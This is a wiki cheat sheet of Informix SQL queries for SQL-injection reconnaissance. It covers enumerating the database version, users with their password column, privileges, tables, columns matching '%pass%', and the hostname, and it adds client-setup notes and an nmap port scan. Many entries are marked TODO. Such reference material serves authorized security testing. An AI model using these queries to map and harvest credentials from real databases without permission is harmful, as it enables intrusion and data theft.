hacking:sql_injection_cheat_sheet_informix
Hacking - SQL Injection Cheat Sheet (Informix)
| Version | SELECT DBINFO('version', 'full') FROM systables WHERE tabid = 1;
SELECT DBINFO('version', 'server-type') FROM systables WHERE tabid = 1;
SELECT DBINFO('version', 'major'), DBINFO('version', 'minor'), DBINFO('version', 'level') FROM systables WHERE tabid = 1;
SELECT DBINFO('version', 'os') FROM systables WHERE tabid = 1; -- T=Windows, U=32 bit app on 32-bit Unix, H=32-bit app running on 64-bit Unix, F=64-bit app running on 64-bit unix
|
| Comments | select 1 FROM systables WHERE tabid = 1; – comment |
| Current User | SELECT USER FROM systables WHERE tabid = 1; select CURRENT_ROLE FROM systables WHERE tabid = 1; |
| List Users | select username, usertype, password from sysusers; |
| List Password Hashes | TODO |
| List Privileges | select tabname, grantor, grantee, tabauth FROM systabauth join systables on systables.tabid = systabauth.tabid; -- which tables are accessible by which users select procname, owner, grantor, grantee from sysprocauth join sysprocedures on sysprocauth.procid = sysprocedures.procid; -- which procedures are accessible by which users |
| List DBA Accounts | TODO |
| Current Database | SELECT DBSERVERNAME FROM systables where tabid = 1; – server name |
| List Databases | select name, owner from sysdatabases; |
| List Columns | select tabname, colname, owner, coltype FROM syscolumns join systables on syscolumns.tabid = systables.tabid; |
| List Tables | select tabname, owner FROM systables; |
| select tabname, viewtext FROM sysviews join systables on systables.tabid = sysviews.tabid; | |
| List Stored Procedures | select procname, owner FROM sysprocedures; |
| Find Tables From Column Name | select tabname, colname, owner, coltype FROM syscolumns join systables on syscolumns.tabid = systables.tabid where colname like '%pass%'; |
| Select Nth Row | select first 1 tabid from (select first 10 tabid from systables order by tabid) as sq order by tabid desc; – selects the 10th row |
| Select Nth Char | SELECT SUBSTRING('ABCD' FROM 3 FOR 1) FROM systables where tabid = 1; – returns 'C' |
| Bitwise AND | select bitand(6, 1) from systables where tabid = 1; -- returns 0 select bitand(6, 2) from systables where tabid = 1; -- returns 2 |
| ASCII Value → Char | TODO |
| Char → ASCII Value | select ascii('A') from systables where tabid = 1; |
| Casting | select cast('123' as integer) from systables where tabid = 1;
select cast(1 as char) from systables where tabid = 1;
|
| String Concatenation | SELECT 'A' || 'B' FROM systables where tabid = 1; -- returns 'AB'
SELECT concat('A', 'B') FROM systables where tabid = 1; -- returns 'AB'
|
| String Length | SELECT tabname, length(tabname), char_length(tabname), octet_length(tabname) from systables; |
| If Statement | TODO |
| Case Statement | select tabid, case when tabid>10 then “High” else 'Low' end from systables; |
| Avoiding Quotes | TODO |
| Time Delay | TODO |
| Make DNS Requests | TODO |
| Command Execution | TODO |
| Local File Access | TODO |
| Hostname, IP Address | SELECT DBINFO('dbhostname') FROM systables WHERE tabid = 1; – hostname |
| Location of DB files | TODO |
| Default/System Databases | These are the system databases: sysmaster sysadmin* sysuser* sysutils* * = don't seem to contain anything / don't allow reading |
| Installing Locally | You can download Informix Dynamic Server Express Edition 11.5 Trial for Linux and Windows. |
| Database Client | There's a [[https://www14.software.ibm.com/webapp/download/search.jsp?rs=ifxdl|database client SDK]] available, which might be of use. I couldn't get the demo client working.
I used [[http://squirrel-sql.sourceforge.net/|SQuirreL SQL Client Version 2.6.8]] after installing the [[https://www14.software.ibm.com/webapp/download/search.jsp?go=y&rs=ifxjdbc|Informix JDBC drivers]] ("emerge dev-java/jdbc-informix" on Gentoo).
|
| Logging in from command line | If you get local admin rights on a Windows box and have a GUI logon:
- Click: Start | All Programs | IBM Informix Dynamic Server 11.50 | someservername. This will give you a command prompt with various Environment variables set properly.
- Run dbaccess.exe from your command prompt. This will bring up a text-based GUI that allows you to browse databases.
The following were set on my test system. This may help if you get command line access, but can't get a GUI - you'll need to change "testservername":
set INFORMIXDIR=C:\PROGRA~1\IBM\IBMINF~1\11.50
set INFORMIXSERVER=testservername
set ONCONFIG=ONCONFIG.testservername
set PATH=C:\PROGRA~1\IBM\IBMINF~1\11.50\bin;C:\WINDOWS\system32;C:\WINDOWS;
C:\WINDOWS\System32\Wbem;C:\PROGRA~1\ibm\gsk7\bin;C:\PROGRA~1\ibm\gsk7\lib;
C:\Program Files\IBM\Informix\Clien-SDK\bin;C:\Program Files\ibm\gsk7\bin;
C:\Program Files\ibm\gsk7\lib
set CLASSPATH=C:\PROGRA~1\IBM\IBMINF~1\11.50\extend\krakatoa\krakatoa.jar;
C:\PROGRA~1\IBM\IBMINF~1\11.50\xtend\krakatoa\jdbc.jar;
set DBTEMP=C:\PROGRA~1\IBM\IBMINF~1\11.50\infxtmp
set CLIENT_LOCALE=EN_US.CP1252
set DB_LOCALE=EN_US.8859-1
set SERVER_LOCALE=EN_US.CP1252
set DBLANG=EN_US.CP1252
mode con codepage select=1252
|
| Identifying on the network | My default installation listened on two TCP ports: 9088 and 9099. When I created a new "server name", this listened on 1526/TCP by default. Nmap 4.76 didn't identify these ports as Informix: $ sudo nmap -sS -sV 10.0.0.1 -p- -v --version-all ... 1526/tcp open pdap-np? 9088/tcp open unknown 9089/tcp open unknown ... TODO How would we identify Informix listening on the network? |
References
hacking/sql_injection_cheat_sheet_informix.txt · Last modified: 2020/07/15 10:30 by 127.0.0.1